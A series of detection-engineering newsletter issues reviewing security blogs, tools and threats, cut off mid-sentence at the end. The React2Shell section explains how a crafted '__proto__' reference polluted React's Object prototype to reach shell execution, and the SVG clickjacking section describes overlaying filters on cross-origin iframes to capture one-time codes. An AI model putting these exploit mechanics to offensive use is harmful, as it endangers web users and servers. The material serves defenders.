Let’s look at a basic alerting example with Amazon AWS Administrator login activity.

The rule is in purple and only alerts on log activity where the user field value is admin. The SIEM correctly identifies the user field containing admin three times. The 11AM alert is a true positive: the administrator credentials were compromised. The other two are false positives, indicating normal administrative work. To make things worse, the compromised login happened during normal business hours.

So how do you differentiate between the three alerts?

You differentiate them by spending incident response cycles investigating each one. Now imagine 100s or 1000s of these being generated. The atomic rule strategy doesn’t work because there is little to no context on the event.

The same thing can be said for IP-based C2 alerting.

In this example, the detection engineer wrote an atomic detection rule for a known C2 IP address. Perhaps they read a blog some time around December 10 and added it quickly to find exposure. Log 1 enters the SIEM; the rule checks the destination field and generates a true-positive alert.

Fantastic! Let’s keep the rule!

The C2 was taken down by the leasing company that owns it on December 11 due to the blog post. On January 15, a content delivery network leased the IP address, and network traffic logs flowing through the SIEM triggered an alert. Every subsequent network log afterward is a false positive.
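Both examples boil down to a single-field match with no surrounding context. Here's a minimal Python sketch of that logic; the field names and indicator values are made up for illustration:

```python
# Two atomic detections: each inspects one field of one event, nothing more.
C2_IPS = {"198.51.100.23"}  # indicator copied from a (hypothetical) blog post

def atomic_c2_rule(event):
    """Fire on any network event whose destination matches the C2 list."""
    return event.get("dst_ip") in C2_IPS

def atomic_admin_rule(event):
    """Fire on any login event where the user field contains 'admin'."""
    return event.get("action") == "ConsoleLogin" and "admin" in event.get("user", "")
```

Both rules keep firing after the IP is re-leased to a CDN, or when an admin logs in for routine work; nothing in the logic can tell those cases apart.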

The context from both of the graphs above sits under the UNUSED field in the purple box. Associated domains, timestamps, and physical location are all useful fields to add to the atomic rule to increase its robustness and remove false positives. It would make sense, then, to start including all of these in your detection rule. But detection engineers need to understand the relationship between detection context and cost.

Imposing cost on ourselves

As we progress up the Pyramid of Pain and add context to our ruleset, the cost increases. Cost can depend on time, resources, maintenance, or the technology needed to add context, such as threat intelligence. The following graph tries to explain this causal relationship:

At the bottom left, you could deploy a rule similar to the examples above. Because the operational cost of matching on a single value is low, the context is low. And because the context is low, the risk for false positives is high. As you add context (move to the right), the cost increases, but the false-positive rate decreases.

This is why not every rule can be perfectly accurate. There is a cost-benefit tradeoff, as well as information asymmetry from attacker behavior, that detection engineers must consider. The only way a rule can catch all threat activity is to alert on every piece of activity. That seems costly!

Conclusion

Atomic detection rules generally focus on low-context events or values. They can certainly help a blue team function, such as a SOC or a Detection & Response team, and they have a place in security operations. They risk generating many noisy alerts when the detection engineer fails to account for a threat actor’s behavioral patterns.

The Pyramid of Pain and imposing cost are industry-accepted concepts that help contextualize the competing objectives of blue teamers and threat actors. Writing rules to alert on the bottom layers of the pyramid, which primarily involve threat intelligence indicators (IP addresses, domains, hash values), imposes a greater cost on defenders than on threat actors. Defenders impose more pain on threat actors by climbing the Pyramid and writing rules that detect Tools and TTPs.

For the next few parts of this series, I’ll explain the different ways detection engineers can write rules to capture threat actor behavior and the associated operational complexity.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

DEW #140 - SVG Filter ClickJacking, Detection Engineering "Onboarding" and React2Shell spotlight

10 December 2025 at 14:03

Welcome to Issue #140 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

  • I’m in Paris this week after a quick personal trip to London. None of you told me that there are more people walking around in the West End than Manhattan!

  • I managed to get some great BJJ training in while in London, and tried cold plunging for the first time ever. Low key it’s amazing

  • This issue is vulnerability writeup forward. But, I’m happy for it, because I think people in blue team roles need to see and understand the inner workings of malicious, unintended code paths. IMHO it makes me a better security engineer

Primary Sponsor: Permiso Security

ITDR Playbook: Detect & Respond to Suspicious Authentication Patterns

Credential compromise now drives more than half of today’s breaches—and most teams still miss early warning signs. This Identity Threat Detection & Response Playbook breaks down the highest-value authentication anomalies and provides actionable detection and response steps your team can implement immediately. Strengthen identity defense where it matters most.

Download the Playbook


💎 Detection Engineering Gem 💎

SVG Filters - Clickjacking 2.0 by lyra

I wrote a blog about abusing Open Graph previews 7 years ago for phishing. The idea was that you could abuse how browsers render preview links to display one thing while redirecting to another. I’ve always tried to find a term or phrase to coin this style of attack. It’s not malware or phishing, but similar to IDN homograph attacks, it provides a confusing user experience for the victim. And within that confusing experience, you can socially engineer them to click into whatever malicious URL you want.

ClickFix became a huge hit for threat actors between last year and this year, and it abused this same concept. You are presented with instructions to copy and paste something into your terminal to download some piece of software or fix a bug. But by abusing how clipboard interactions work with a website, the user thinks they are copying and pasting a benign command, and they instead paste a malicious payload.

Lyra’s blog follows the same confusing user experience style, but this time, doing some fun things with SVG rendering. They got their original idea after Apple announced the Liquid Glass redesign, and wanted to recreate some of that experience in the web browser. After tinkering with some of the SVG Filter Effect primitives, they tried applying these effects over an iFrame, and whoops! It worked.

The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document? - Lyra

The first demonstration was a PoC layering these types of effects over an iframe containing a sensitive one-time password code. As the attacker, you load the OTP page inside an iframe, then trick the user into pasting the code back into what they think is the legitimate site, but is actually an SVG element on top. They dubbed this style of attack SVG ClickJacking.

This isn’t even the most interesting part; it gets better! These <fe*> elements have some mathematical capabilities to help compute everything from masks to filters. Due to the nature of this attack, most of the logic has to occur inside the <fe*> elements, because you cannot extract pixel data from an SVG filter back into JavaScript or the DOM. So how do you create a multi-stage attack?

Well, why not make these elements functionally (not Turing) complete and create a limited-but-effective state machine inside the filters? That’s obvious, right, Zack? ←Lyra, probably, as they did this
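For intuition, here’s a hedged simulation of one plausible building block (my illustration, not necessarily Lyra’s exact construction): per the SVG spec, feComposite with operator="arithmetic" computes k1·i1·i2 + k2·i1 + k3·i2 + k4 per channel, which is enough for logic gates once you treat pixel values as 0/1:

```javascript
// Sketch: feComposite operator="arithmetic" computes, per channel,
//   result = k1*i1*i2 + k2*i1 + k3*i2 + k4
// Treating binary pixel values (0/1) as booleans turns it into logic gates.
const arithmetic = (k1, k2, k3, k4) => (i1, i2) =>
  k1 * i1 * i2 + k2 * i1 + k3 * i2 + k4;

const AND = arithmetic(1, 0, 0, 0);               // i1*i2
const OR  = arithmetic(-1, 1, 1, 0);              // i1 + i2 - i1*i2
const NOT = (i) => arithmetic(0, -1, 0, 1)(i, 0); // 1 - i1

console.log(AND(1, 1), OR(1, 0), NOT(1)); // 1 1 0
```

Chain enough of these filter stages together and you have the limited state machine the attack needs, all evaluated by the renderer rather than JavaScript.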

Lyra made a logic-gate example to demonstrate this, but by applying a multi-stage filter mask to a victim iFrame, they successfully showed how they can perform this SVG ClickJacking attack within a state machine rendered solely from these <fe> elements. Here’s an ASCII art example of the QR code attack with exfiltration:

The cross-origin part worries me the most here, because they essentially figured out how to overlay and extract data from the attack without breaking CORS.

They demonstrated this attack against Google Docs and were awarded a good sum of money for doing so. Video here:

https://infosec.exchange/@rebane2001/115265287713185877

I don’t know how you’d detect this in the browser, but you could have some exfiltration-style detections to work with once the data leaves the machine. UX Confusion strikes again!


🔬 State of the Art

Why the MITRE ATT&CK Framework Actually Works by John Vester

I read a lot of blog posts introducing MITRE ATT&CK to readers. I think it’s a great first topic for folks getting into the industry, because ATT&CK is such a staple for us. My biggest feedback on these blog posts is that they aren’t really offering anything new for readers. This isn’t a bad thing, since the content shouldn’t change too much, but Vester’s blog here stands apart from the others I have read.

The blog starts with the typical introductory content on MITRE ATT&CK, but in the “Real-world ATT&CK” section, Vester begins describing ATT&CK as a practitioner who has been doing this for years. They do this by looking at how ATT&CK appears when overlaid with detection rules inside Sumo Logic.

I appreciate this approach because it feels like you’re onboarding at a new company and Vester is the senior engineer giving you the experienced perspective on the whole system. ATT&CK has plenty of faults, and much of the criticism it receives points at its real-world applicability. Luckily, Vester shows where it works really well and where it doesn’t. This type of balance is what makes ATT&CK useful; it’s a tool rather than a full-fledged solution.


Understanding the Nuances of Detection by Danny Zendejas

Maybe I’m stuck on this idea of reading blogs as if I’m onboarding at a new company, but Zendejas’s blog about detection nuances here is a great follow-up to Vester’s above.

We take a lot of time jumping straight into rules and ATT&CK, but taking time to understand the logistics of detection engineering matters just as much. For example, Zendejas laid out the general architecture for SIEM, and then introduced readers to the types of formats and standards dedicated to search languages and rules.

Understanding and navigating these formats effectively is a fundamental part of a Detection Engineer’s role. Being data agnostic should be the goal. - Zendejas

The rest of the blog contains some good content around alert precision and alerting. If you put on a proverbial “onboarding at a new job” hat, this is a great introduction for folks entering the field or seeking a fresh look at fundamental concepts.


Threat Hunting based on Tor Exit Nodes (+ KQLs queries) by Sergio Albea

The Onion Routing (Tor) network is one of those funny cases of intention versus use. The idea behind it is ethically amazing: it helps mask the source of a connection to a destination server, and it would be particularly useful for people like political dissidents in hostile countries. But, whenever there is anything good, criminals tend to follow and exploit the goodness. Except crypto, all criminals! Just kidding.

In this post, Albea provides some excellent hypotheses and use cases for threat hunters to find machines on a network connecting to the Tor network. The first case is around the use of Tor locally to connect to Tor domains. This, in my opinion, is benign behavior for the most part, but it can raise legal and ethical concerns for a company, so your acceptable use policies should address it.

The second case is rooted in a more likely intrusion scenario. Attackers have used Tor to mask their source IP addresses while credential stuffing login endpoints, preventing attribution and likely legal action. Although this makes sense from a privacy perspective, it’s terrible OPSEC in other ways. By design, the Tor network publishes its exit node IP address list because, without it, Tor clients won’t know how to route through it. That makes an excellent detection mechanism for finding abusive sign-in attempts from those routing their malicious traffic through Tor.

They provide several KQL examples so you can follow along with their hunting queries.
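As a language-agnostic sketch of the underlying logic (hypothetical event shape and sample IPs, not Albea’s actual KQL), the hunt is just a set intersection between the published exit list and your sign-in telemetry:

```javascript
// Hedged sketch: flag sign-ins whose source IP is a known Tor exit node.
// The event shape and IPs are illustrative; the real exit list is published
// by the Tor Project and should be refreshed regularly.
function findTorSignIns(exitNodeIps, signInEvents) {
  const exits = new Set(exitNodeIps);
  return signInEvents.filter((e) => exits.has(e.sourceIp));
}

const exitList = ["185.220.101.4", "171.25.193.20"]; // sample values
const events = [
  { user: "alice", sourceIp: "203.0.113.7" },
  { user: "bob", sourceIp: "185.220.101.4" },
];
console.log(findTorSignIns(exitList, events)); // only bob’s sign-in matches
```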


How Amazon uses AI agents to anticipate and counter cyber threats by Daniel Weiss

This research piece from Amazon showcases their Autonomous Threat Analyst (ATA) environment. If you take AI out of the equation, it’s a neat setup that I haven’t really seen in other corporate environments. They created a separate rule-testing environment that mimics their production environment, which is a feat in itself.

Now to add the AI parts back: they have a multi-agent architecture where a blue-team agent creates rules, validates rule logic by querying the mimicked environment, and performs curation and deployment. The fun part here is their red-team agent. They prompted it to generate Python reverse shells for detection validation, and it produced over 30. They fed telemetry from these reverse shells into the mimicked environment and identified detection gaps to improve their ruleset.

The beauty of LLMs for detection isn’t really accuracy, but scale. What I worry about with this type of scale is the false comfort it brings. Over thirty types of reverse shells seems like a great dataset, but was each one validated by an expert? Will LLMs generate obscure and distracting payloads just to complete their task? If we only care about coverage at scale, will these LLMs waste time on those instead of what we actually see in the environment?

These are all questions for which I don’t have a good answer. But, it may not matter in the sense that if we keep driving token costs down, then scale becomes irrelevant, even if the types of attacks are obscure.


Secondary Sponsor: runZero

Join runZero’s Holiday Hackstravaganza!


Tune into runZero Hour, a monthly webcast examining new exposures & attack surface anomalies. Join us on Dec 17 for 2025’s wildest vulns, top research picks, & 2026 predictions. Plus, trivia and Hak5 gift cards!

Register Now


☣️ Threat Landscape

⚡ Emerging Threats Spotlight: React2Shell

So the big threat landscape news in the last week was the React2Shell vulnerability. The exploit is elegant and simple, but the way the exploit chain leverages React’s processing capabilities is quite complex. Whenever 10/10 CVSS CVEs like this come out, the immediate thought is oh shit, another Log4Shell. It’s even worse when the researchers name the vulnerability something similar to Log4Shell, and this was no exception.

For those unfamiliar with React, it’s one of the biggest open-source frontend frameworks for arguably the most used programming language in the world, JavaScript. You can build highly responsive, complex, and beautiful applications and hook them into any backend framework of your choice.

The specific vulnerability is server-side prototype pollution. Every object in JavaScript inherits from the base Object prototype. So, when you build object primitives in JavaScript, everything from a User to a Window can use Object’s properties. Here’s a basic example courtesy of Claude:
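A minimal sketch of that lookup, with a hypothetical person object:

```javascript
// A plain object with one own property.
const person = { name: "Zack" };

// person defines no toString of its own, so the lookup walks the
// prototype chain up to Object.prototype, which does implement it.
console.log(Object.prototype.hasOwnProperty.call(person, "toString")); // false
console.log(person.toString()); // "[object Object]"
console.log(Object.getPrototypeOf(person) === Object.prototype); // true
```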

A person is an object with a single property, name. You can call person.toString() even though person doesn’t define a toString method. That’s because all objects in JavaScript inherit from Object by default, so the lookup keeps “calling” up the prototype chain until it reaches something that does implement the method, such as toString!

This is where things get interesting for React2Shell. If you can control the input to a JavaScript function in React, such that you can supply or override functions, you can achieve arbitrary code execution. This is the premise behind React2Shell.

My colleagues at Datadog wrote about this in an excellent post detailing the vulnerability details:

The payload is from lines 4-15. The prototype pollution that overrides then is on line 5, and the actual malicious payload sits under _prefix on line 10. It’s a shell execution command, so if a vulnerable React server processes this specific payload, it will call out to a shell and write the output of id to /tmp/pwned.

React’s vulnerable codepath processes HTTP POST requests with the `Next-Action` header and attempts to deserialize the payload as a React Server Component action. During deserialization, React splits references like $1:__proto__:then on colons and traverses the property chain, inadvertently accessing Object.prototype when it hits __proto__ and boom, Object is polluted!
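Here’s a stripped-down illustration of that unsafe traversal pattern (my sketch, not React’s actual deserializer):

```javascript
// Hedged sketch of the unsafe pattern: splitting a reference string on ":"
// and walking properties lets "__proto__" jump to Object.prototype.
function resolveReference(root, ref) {
  const parts = ref.split(":");
  let obj = root;
  for (const part of parts.slice(0, -1)) {
    obj = obj[part]; // "__proto__" resolves to Object.prototype
  }
  return { parent: obj, key: parts[parts.length - 1] };
}

const chunks = { "1": {} };
const { parent, key } = resolveReference(chunks, "1:__proto__:then");
parent[key] = () => "polluted"; // writes Object.prototype.then

const leaked = ({}).then(); // every object now "has" a then method
delete Object.prototype.then; // undo the pollution
console.log(leaked); // "polluted"
```

Once Object.prototype.then is attacker-controlled, any later code that duck-types the object as a promise (checking for a then method) ends up calling the attacker’s function.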

Why is this such a big deal?

React2Shell had the right ingredients to make it a serious vulnerability with an industry-wide response. These ingredients included a CVSS 10 score with potential remote code execution, a PoC, a website, a reference to a patch to reverse-engineer, and some hype on social media. Organizations rushed to find exposure and a patch, and some accidentally took down their global CDN network in the process. There were exploitation attempts in the wild (Greynoise has a great writeup on this). My $dayjob saw our environments get hit hard once more PoCs started to drop.

The hard part here, as Kevin Beaumont points out, is the environmental context when deploying this version of React Server Components with the Next.js router. A lot of prerequisites were required, not for the exploit itself, but for the stack that needed to be deployed, which had the vulnerable code path. And if you didn’t have any of these web servers exposed to the Internet, the urgency factor of patching diminished.

But was there as much impact as Log4Shell?

The answer is a resounding no, but with a big asterisk*. Nothing compares to Log4Shell, as it truly was a black swan event in vulnerability land. But this is the problem with emerging news around vulnerabilities. We make comparisons to make sense of the chaos, and try to use that to inform urgency. So although this turned out to be mostly fine from an impact point of view, I believe we correctly placed the right amount of urgency to do something.

It’s a net positive for an industry that has a reputation for crying wolf over the smallest things. It means we are getting smarter at identifying the prerequisites for a black swan event and being okay with it not happening, because we still protected ourselves.

Firm handshakes to all who responded within the last week!


🔗 Open Source

Bert-JanP/KustoHawk

PowerShell-based incident and triage platform for Azure environments. It uses the Microsoft Graph API to query events related to Entra, Defender, and Microsoft XDR. It ships pre-baked queries so you can run investigations out of the box.


xorhex/BinYars

Binary Ninja plugin to run YARA-x rules inside a binja project. This is useful for reverse engineering workflows where you want to orient your understanding of the binary based on threat intelligence baked into YARA rules.


msanft/CVE-2025-55182

Fully contained PoC environment for React2Shell. The README also has a great explanation of the vulnerability and exploit chain.


qazbnm456/awesome-cve-poc

Yet another awesome-* list, but similar to the CVE-2025-55182 repository I linked above, contains references for all kinds of PoC code and environments for testing. I’ve found these most useful for when I need to capture telemetry and write rules in an environment that doesn’t mind getting exploited ;).

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

DEW #139 - Detection Surface, Frontier Models are good at SecOps & THREE YEAR ANNIVERSARY!

3 December 2025 at 14:03

Welcome to Issue #139 of Detection Engineering Weekly!

It’s crazy to think that it’s been three years of doing this newsletter.

Thank you all for making this a fantastic ride. Since I like stats and insights, here are some I pulled:

  • 15,000 subscribers as of Monday :)

  • 138 issues in total, so not a perfect 156 straight issues; 20 weeks of downtime sounds nice to me

  • Two kids, one major interstate move, one grad degree and no new tattoos, though I should commemorate this somehow and get a new one :)

  • At least one subscriber in all 50 states in the US. California, Texas, NY, Virginia and Florida are the top 5 most-subbed states

  • Subscribers from 153 countries across every continent. Substack doesn’t track Antarctica :(. US, India, UK, Canada & Australia are the top 5 most-subbed countries

  • If you like reading Ross Haleliuk, there’s a 30% chance you are also reading me. We have the top audience overlap! Eric Capuano, Jake Creps, Chris Hughes and Francis Odum are also fantastic newsletters with high overlap

  • I started sponsored ad placements in September and have been booked every week since then, and 2026 is looking even crazier

This Week’s Sponsor: root

Why Detection Teams Need Minute-Level Remediation

When CVE-2025-65018 dropped last week (libpng heap buffer overflow, CVSS 7.1-9.8), the exposure window started ticking. Attackers armed with AI can weaponize CVEs within hours. Traditional remediation workflows take 2-4 weeks: triage meetings, engineering scramble, testing delays.

But here’s what detection engineers need to know: the exposure window is where attackers win. The Root team patched the critical CVE in 42 minutes across three Debian releases (Bullseye, Bookworm, Trixie), creating a fundamentally different detection posture than the same CVE unpatched for weeks. Detection strategies must account for minute-level remediation capabilities.

Learn what CVE-2025-65018 teaches us about matching attackers at AI speed and why week-level remediation cycles leave detection teams with massive blind spots.

Full Story

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!


💎 Detection Engineering Gem 💎

Turning Visibility Into Defense: Connecting the Attack Surface to the Detection Surface by Jon Schipp

I’ve been shilling the term “Attack Surface” with the detection team here at work. I think it’s a reasonable mental model to use when you need to focus detection efforts on your inventory and telemetry sources. So, when I read this post by Schipp, I was pleased to see a similar framing of the Attack Surface problem :).

The security industry has a good idea of what an attack surface is. It even has a product category vertical dedicated to it, but the definition becomes vague when you differentiate between internal and external attack surfaces. According to Schipp, the definition should focus on the assets you need to protect, which, in general, I agree with. There is no rule without telemetry, and it’s nearly a full-time job for detection engineers to identify, track, and ship the right telemetry so we can write detections.

From Schipp’s blog

Schipp takes this a step further with the concept of the “detection surface”: the adversarial behavior you want to detect can only be detected in a subset of the assets that you own. He frames the gap with a few questions:

  • Do you have the right technology selected to generate the right telemetry and alerts on top of the assets you own?

  • Are you prioritizing the correct detections to find adversarial behavior in the assets you find the most critical?

  • How do you find new gaps in coverage, and are you doing the exercise enough as your attack surface grows?

These questions are why the 100% MITRE coverage meme exists in our space. You may write rules that cover 100% of ATT&CK, but are they detecting the right behavior given your environment? I’d much rather look at a MITRE ATT&CK heatmap with deep coverage in two tactics, like Exfiltration and Lateral Movement, so I know the team is really focusing on specific behaviors to catch.

If you want to see a visceral physical reaction from me, throw a print-out of an all-green ATT&CK heatmap at me. I’ll probably run away screaming.


🔬 State of the Art

Evaluating AI Agents in Security Operations Part 1 and Part 2 by Eddie Conk

~ Note, I had Part 1 ready to go for this week’s issue and Conk & the cotool team posted Part 2. It’s important to read Part 1 so you can understand my analysis for their follow-up blog! ~

I loved reading this post because it shows how detection-as-code evolves beyond your ruleset into AI agents that handle everything from rule triage to investigations. Cotool researchers performed a benchmarking analysis of frontier models (GPT-5, Claude Sonnet & Gemini) against Splunk’s Botsv3 dataset. Botsv3 is a security dataset containing millions of logs from real-world attacks, along with a series of questions in a CTF-like format for analysts to practice investigations.

Benchmark exercises like this answer more than “are these models accurately performing security tasks?” LLMs are cost-prohibitive, as in, they require financial capital to use the frontier model APIs, and human capital to shape, maintain, and verify results. AI agent efficacy is detection and investigation efficacy. Understanding ahead of time which agents perform well within the constraints of your business can accelerate decision-making.

Here are some of the results pasted from the blog:

The test harness for accuracy involved taking the individual CTF questions from Botsv3 and mapping them to investigative queries. Conk and team had to remove some bias from these questions because they were built as a progressive CTF. Basically, this means that answering one CTF question unlocked the next sequential question, and that sequential question could bias the investigation.

The latest frontier models from OpenAI and Anthropic outperformed Gemini here, but I was surprised to see 65% as a leading score.

Model investigative speed now enters the equation, and Anthropic’s Opus-4.5 beat the brakes off of every other model, including Haiku and Sonnet. This is good for teams who want to tune something to be fast and accurate, which seems like a good tradeoff, and it’s off to the races, right? Well, remember, detection efficacy means cost as much as it means accuracy, and the frontrunner, Opus-4.5, costs a little over $5 per investigation versus GPT-5.1’s $1.67.

There are a few other interesting callouts in the blog around token usage, but these three axes were the most relevant for people who need to balance accuracy, speed, and cost.

The detection community needs data like this to make cost-efficacy tradeoffs for their teams. Hopefully, we can see more studies comparing models, cost, and prompt strategies, and even better, releasing bootstrapping mechanisms to run these tests on our own.


OpenSourceMalware - Community Threat Database

This is a freely available threat intelligence database for reporting and tracking malicious open-source package malware. This is especially relevant for emerging threats, such as the Shai-Hulud attack, and it’s crazy to see how many packages are submitted nearly every day. If you sign in, you can view additional analysis details of the malware submitted by researchers.

Unfortunately, there are no direct IOCs on the page, so it’s hard to pivot to hashes if you want to download them from platforms like VirusTotal. It does link to sources like osv.dev, which sometimes contain hashes, but it’d be nice to see this platform host malware samples for download.


Revisiting the Idea of the “False Positive” by Joe Slowik

This oldie-but-goodie blog by Joe Slowik on the concept of false positives in security operations really drives home the underlying issues of the label. He first frames the idea of labels like true and false positives in terms of their origins in statistics. I wrote about these labels previously, and I tried to help readers understand that their value is directly proportional to the capacity of your security operations team.

Slowik goes in the other direction in terms of their value; instead of thinking about units of work, you should think about these labels in terms of the underlying behavior and hypothesis. Analysts talk about “true benigns” in this way. You alerted on the specific behavior you wanted to alert on, but you want to investigate further to determine whether it is malicious. This breaks the pure 1-shot application of a confusion matrix and adds more work for security analysts, since we need to question our underlying assumptions about a specific detection.

Recreated flow diagram from Slowik’s post

Challenging the hypothesis behind your detections aligns well with my discussion of security operations capacity versus efficacy. Here are a few questions I would ask you during this exercise:

  • Are you finding the right behaviors that could indicate maliciousness?

  • Are you okay with these behaviors generating true benign alerts, because the idea of a false negative with that behavior is detrimental?

  • Can the behavior you are looking for be enriched with environmental context, such as update cycles, peak traffic, or off-hours traffic?

The core of detection engineering is challenging assumptions. I hate the adage of “defenders have to be right every time, attackers have to be right once.” Finding a singular behavior to alert on across the attack chain gives us the advantage, so we really only need to be right once. So, as you build hypotheses and detection rules, you should balance what you want to see from a detection, even if it’s true benign behavior.
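Slowik’s split can be sketched as a toy triage function. The field names here are mine and purely illustrative:

```javascript
// Hedged sketch: separating "true benign" from a classic false positive.
// behaviorMatched: did the rule fire on the behavior it was written for?
// malicious: did the investigation conclude the activity was hostile?
function triageLabel({ behaviorMatched, malicious }) {
  if (!behaviorMatched) return "false positive"; // rule logic missed its target
  return malicious ? "true positive" : "true benign"; // hypothesis held either way
}

console.log(triageLabel({ behaviorMatched: true, malicious: false })); // "true benign"
```

The point of the third label is that a "true benign" is not a tuning failure; the hypothesis behind the rule held, and closing it as a plain false positive would erase that signal.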


Intel to Detection Outcomes by Harrison Pomeroy

This is a nice introductory post to leveraging threat intelligence in detections.ai to generate detection outcomes. Full transparency: the platform has sponsored this newsletter, but it also has a community edition, so folks can sign up to benefit.

One of the hardest problems in cyber threat intelligence that I’ve dealt with for 15 years is proving tangible value. This is different than intangible value. The delivery of finished intelligence reports, RFIs, and investigative platform experiences can be considered intangible. You miss these things when you don’t have them, but it’s hard to measure the “why” behind the impact of a report or an RFI.

Detection engineering helps bridge this gap, specifically by enabling cyber threat intelligence teams to turn their research into tangible outcomes. This is what Pomeroy argues LLMs can do. You can feed an agent a cyber threat intelligence report, it can parse IOCs, TTPs, and log sources, and it can generate rules for you to try out and deploy to get up-to-date coverage of emerging threats.


Introducing LUMEN: Your EVTX Companion by Daniel Koifman

This is the release blogpost for Daniel Koifman’s LUMEN project, located at https://lumen.koifsec.me/. It’s a free tool for investigators and incident responders to load Windows evtx files for analysis. There are over 2,000 preloaded Sigma rules, and the entire analysis engine runs client-side. You can do several things once you load your logs in, such as running a sweep of the Sigma ruleset, building a dashboard on fired rules, building an attack timeline, and extracting IOCs. It also has a feature to connect your favorite LLM platform to the tool using an API key and leverage it for AI copilot capabilities.


☣️ Threat Landscape

Meet Rey, the Admin of ‘Scattered Lapsus$ Hunters’ by Brian Krebs

This is a classic Krebs doxing piece unveiling the identity of one of the main personas of The Com group, Scattered Lapsus$ Hunters. Rey was an administrator of one of the Com-aligned ransomware strains, ShinySp1d3r. It’s always crazy how he manages to pull the attribution thread to find these identities. An old message from Rey contained a joke screenshot of a scam email they received with a unique password. From there, he pivoted on the password to find more breach data tying Rey to a real person. Since Rey didn’t respond to him, Brian called his dad, and of course, Rey responded.


The Shai-Hulud 2.0 npm worm: analysis, and what you need to know by Christophe Tafani-Dereeper and Sebastian Obregoso

~ Note, I work at Datadog, and Christophe & Sebastian are my coworkers! ~

It’s rare to see the term worm inside a headline these days. It’s a rare label for a unique security phenomenon, and the idea still holds firm, this time targeting npm (again). The Datadog Security Research team put a lot of time and energy into their analysis of the latest Shai-Hulud wave. Some interesting notes from this campaign include using previous victims to post new victim data, a wiper component, and a clever local GitHub Actions persistence mechanism.


Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks by Kirill Boychenko

Boychenko and the Socket Research team published their latest work on TTP updates to North Korea’s “Contagious Interview” campaign. It’s an impressive operation, given the scale they try to employ, aiming to conduct as many malicious interviews as possible. In this campaign, they tracked hundreds of malicious packages with over 31,000 downloads. The factory-style setup of rolling new GitHub users with the malicious interview code, fake LinkedIn profiles, and rotating C2 servers is classic Contagious Interview.


Unmasking a new DPRK Front Company DredSoftLabs by Mees van Wickeren

To continue on the DPRK train, I found this post fascinating because it wasn’t about the malware associated with WageMole/Contagious Interview, but rather the techniques behind tracking infrastructure. Van Wickeren leveraged the reliable GitHub search engine to find malicious repositories linked to the campaign.

I was a little confused by their use of WageMole, only from a pure clustering nerd perspective. These look like Contagious Interview repositories, and the associated OSINT screenshots that call out some of them suggest that victims were taking malicious coding tests. WageMole, on the other hand, is a fake IT worker applying to companies.

At the end of the day it doesn’t matter too much because they all overlap, but it’s another demonstration of how hard attribution is in this field.


🔗 Open Source

Koifman/LUMEN

Full LUMEN web-app from Daniel Koifman’s blog in State of the Art above. You can host your own LUMEN instance without ever leaving your localhost!


Vyntral/god-eye

Subdomain and attack surface enumeration tool that layers local Ollama AI analysis on top. It connects to twenty different open-source scanning and directory services, like dnsdumpster, then pushes results into the local Ollama model. It looks intelligent enough to help with HTTP probing, CVE analysis, and sifting through JavaScript code for anything leaked or vulnerable to standard web attacks.


R3DRUN3/magnet

Magnet leverages the GitHub API and specific query strings to find potential secrets posted to public repositories. You can specify strings or use the ones magnet provides. In their PoC, R3DRUN3 managed to find two repositories with leaked tokens, then responsibly reached out to the owners with remediation steps, and they responded.


ChiefGyk3D/pfsense-siem-stack

SIEM-in-a-box for pfSense firewalls. It has an impressive architecture: an OpenSearch backend, Logstash parsers, and Grafana/InfluxDB for metrics. It looks like they’ll be extending the SIEM backend to other open-source SIEMs like Wazuh in the future.


RazviOverflow/advent-of-hacks

Awesome-* style list of hacking challenges for the holiday season. So far they have 8 listed, so if you want to spend some time this December upping your hacking and CTF knowledge, you have your work cut out for you!

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

DEW #138 - Sigma's Detection Quality Pipeline, Anthropic finds AI-first APT & eBPF shenanigans

19 November 2025 at 14:03

Welcome to Issue #138 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

  • I switched to the Brave browser, and I don’t think I’m ever looking back

  • My coworker suggested I go to a Tottenham Hotspur match while I’m in London. I’m a fan of one of the most insane fanbases in the NFL, where we jump through folding tables set aflame before games, and I feel that same energy from the Spurs YouTube shorts I’m watching during my research

  • I fractured my rib 5 weeks ago and I’m finally back (carefully) training. It feels good to move again!

This Week’s Sponsor: Sublime Security

Tomorrow: Intro to MQL, Threat Hunting, and Detection in Sublime

We invite Detection Engineering Weekly subscribers to join a technical webinar that will guide you through how Sublime Security detects advanced email threats. Learn how MQL (Sublime’s native detection language), threat-hunting workflows, Lists, Rules, Actions, and Automations all contribute to a flexible detection pipeline.

Additionally, discover how our Autonomous Security Analyst (ASA) accelerates investigations.

Register today!



💎 Detection Engineering Gem 💎

SigmaHQ Quality Assurance Pipeline by Nasreddine Bencherchali

Many people claim to use detection-as-code, but I rarely see these pipelines discussed as transparently as those from SigmaHQ. In this post, Nasreddine provides readers with a complete overview of how Sigma’s community ruleset repository manages community contributions. Documentation is essential here: the Sigma team ensures that every community rule adheres to a specification, so they all appear the same, even down to the filename. Here’s their Linux rule specification:

I love the attention to detail here. When you have a ruleset of thousands of rules, you need to ensure consistency in every step of the detection engineering process. These conventions may not matter when you are a single team managing dozens of rules, but when you are a five-person team managing thousands, they make the ruleset more attractive for others to use and also keep you sane.

The coolest part here, IMHO, is the combination of benign and malicious log validation tests. Each rule in each pull request undergoes several validators, followed by a good-log test and regression testing. The good-log test takes candidate rules and runs them across the evtx-baseline repository. If a rule generates an alert, then it must be a false positive, and the pipeline fails.
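
A toy version of that good-log gate is easy to sketch. The field-equality matcher below is a hypothetical stand-in for real Sigma evaluation, and the rule and baseline events are made up for illustration:

```python
def matches(rule: dict, event: dict) -> bool:
    """Hypothetical matcher: the rule fires only if every required field matches."""
    return all(event.get(k) == v for k, v in rule["detection"].items())

def good_log_gate(rule: dict, baseline_events: list) -> dict:
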